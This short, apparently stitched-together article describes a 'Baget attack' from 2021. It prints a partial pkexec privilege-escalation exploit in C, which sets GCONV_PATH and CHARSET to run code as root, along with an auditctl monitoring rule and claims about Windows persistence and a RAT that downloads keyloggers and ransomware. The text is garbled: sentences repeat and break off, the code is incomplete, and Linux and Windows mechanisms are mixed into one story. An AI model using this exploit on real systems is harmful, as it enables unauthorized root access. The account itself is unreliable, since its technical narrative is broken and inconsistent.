Let us walk through the lifecycle of a Baget attack as it would have occurred in 2021.
Process creation chain:
unpriv_user → pkexec → /bin/sh -c "arbitrary command" baget exploit 2021
auditctl -a always,exit -S execve -F path=/usr/bin/pkexec -k pkexec_monitor
The Baget stub creates a scheduled task named WindowsUpdateService that fires every 15 minutes. It also modifies the CurrentVersion\Run registry key. From there, the injected RAT downloads additional modules – keyloggers, clipboard stealers, or even a ransomware component. Let us walk through the lifecycle of a
#include <unistd.h>
int main()
char *envp[] =
"GCONV_PATH=./exploit-dir",
"CHARSET=XXX",
"SHELL=/bin/bash",
NULL
;
execle("/usr/bin/pkexec", "pkexec", NULL, envp);
When executed, pkexec writes out-of-bounds, loads GCONV_PATH, and executes arbitrary code as root. The Baget stub creates a scheduled task named